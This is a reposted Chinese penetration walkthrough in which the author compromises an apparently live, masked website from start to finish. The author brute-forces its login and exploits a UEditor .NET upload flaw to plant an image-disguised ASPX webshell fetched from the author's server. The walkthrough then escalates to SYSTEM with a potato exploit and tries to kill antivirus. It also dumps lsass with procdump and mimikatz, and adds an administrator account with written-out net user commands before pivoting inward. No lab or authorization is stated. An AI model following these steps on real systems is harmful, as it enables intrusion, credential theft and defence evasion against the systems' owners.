本次教程較為基礎,打碼比較嚴重,有很多不足的地方,希望各位大佬能夠指正。
目標站:http://xxx.com 要求:登錄遠程桌面
通過 超級ping 檢測出網站的IP 直接訪問ip ...
通過FOFA Pro View 這個插件可以快速的掃描出開放的端口 (由于更新,之前的不能用了,修改下地址就可以了)
還有WAppalyzer 這個插件也比較好用快速檢測出網站的中間件等
這里我比較疑惑asp.net 一般都是搭配mssql數據庫吧,它上面顯示開放3306。。。
我訪問一下直接 403
目錄掃描掃出了后臺
嘗試下弱口令
他這里會校驗用戶名 ,通過檢測不會對訪問次數進行限制 ,那還等啥!
burp一梭跑 剛好讓他嘗嘗我大字典的厲害
最終我還是敗了,啥也別說了,上神器xray
出來打工,之前白嫖的高級版還沒上手,今天試試水,
貼出xray的官方使用說明 https://docs.xray.cool/#/tutorial/introduce 這款工具還是蠻好用的,
啥也不說,開干(我懶,就使用基礎爬蟲+掃描網站了)。
。。。有點尬 只能手動測試下了, 習慣性的查看一下有沒有目錄遍歷漏洞 (我自己的手法: 找到一張圖片->右鍵復制地址到地址欄->查看相關路徑->訪問)(注意:圖片一般最好選擇文章或者資料里面的 別問,問就是直覺)
哦啊,沒發現目錄遍歷但是發現了ueditor,聯想到之前插件掃到的web框架是 .net的 有篇文章是專門講解有關Ueditor .net下的漏洞的 https://www.freebuf.com/vuls/181814.html
先訪問一下路徑顯示
利用poc上傳(自己構造好html上傳界面,然后上傳自己服務器上的圖片馬用 ? 進行截斷就可以了)
(服務器:白嫖一年彩虹云云主機 圖片馬: 非常簡單,我們只需要一張圖片1.jpg 一句話木馬寫好的aspx文件 1.aspx,之后我們進入到命令行。
注意:將aspx文件和圖片文件放到同一目錄下,cmd也要跳轉到放文件的目錄下之后執行命令 copy 1.jpg/b + 1.aspx/a 2.jpg 新生成的2.jpg就是我們制作好的圖片馬了。)
將POC中的url更換成我們的目標站,上傳格式 http://myweb.com/1.jpg?.aspx
上傳成功 直接返回一句話地址
成功解析,上菜刀
成功getshell ,查看下權限
這權限屬實有點小,不過還能執行命令 ipconfig 發現是 內網。。。怪不得
Systeminfo
2012 修補了8個補丁 先祭出神站https://bugs.hacking8.com/tiquan/ 在線 exp對比,非常值得推薦
這里看到2012 啥也別說爛土豆一梭跑
發現上傳不上。。。
剛開始我以為是權限的問題后來發現每個文件夾我都不能上傳。。。
搞得我一臉懵* 是不是因為菜刀的問題 那就直接先寫入一個aspx的查詢可讀可寫目錄的馬子
成功寫入并查詢成功 然后新建一個大馬
不是吧,這么難的嗎? 還好我有預編譯出錯的shell
成功 然后配合我的可讀可寫的馬子 成功上傳爛土豆
提權成功 get到system 權限 接下來就是找3389了 netstat -ano
看到一個 33890 越看越像3389 tasklist -svc : 查看系統進程 找到對應的pid
不得不吐槽一下這個管理員 真的有點2...3389端口到手,內網IP到手,system權限到手,接下來直接添加賬號登錄了
Net user abc abc /add 添加賬號net localgroup administrators abc /add 將用戶添加到管理員組
執行命令發現無回顯,剛開始以為對賬號密碼的長度有限制,但是測試了很多次發現不是這個問題,明明是system權限為什么不能添加用戶呢?
在白天打工的時候用手機找到很多類似對應的情況:有殺軟、對賬號密碼有限制、防火墻等等 并且從網上找到了很多繞過的姿勢 晚上回到家二話不說就開干,tasklist -svc
經過我一個一個的百度,終于發現了問題所在 原來存在火絨。。。(對殺毒軟件進程不是很了解)
其實這里我想說明一下,很多人習慣性的遇到一點很問題就問別人,其實完全可以自己先百度一下,這樣不僅可以加深對問題的記憶,將來在遇到同類型問題的時候也可以快速的找到解決的思路
利用白天找到的思路,可以先kill掉火狐的進程這里我就直接貼出方法 https://jingyan.baidu.com/article/656db9183f65c0e381249c83.html
但是事情往往是那么的不盡人意
。。。 n m 玩雞毛 再試試另一種方法,直接mimimakatz讀取administrator的密碼
但是這里是server2012 嘗試使用procdump來導出目標主機的lsass.dmp 到本機用mimikatz讀取密碼
1.導出lsass.exeprocdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.執行mimikatzmimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
(前提需要管理員權限)
讀出了hash沒讀出明文密碼
Sha1解密不出來 還嘗試了很多姿勢,都沒有成功,只能求助大佬了
啥話不說直接開干
+
成功繞過并添加到了管理員組,由于是內網我們直接上 Proxifier+reGeorg(之前遇到過一次內網的環境就是用的這個組合)相關使用方法可以參考:https://www.freebuf.com/column/206524.html 進行了解
然后 就。。。
任務完成 打掃戰場 收工
總結:
安裝相關瀏覽器插件會很方便的進行信息收集遇到問題不要一股腦的問別人,
先想辦法自己解決多收集一些好用的工具、網站等,
用的時候直接就能甩過來多總結自己的經驗和收獲,這樣你才能在實戰中快速上手
轉載自:https://xz.aliyun.com/t/8083
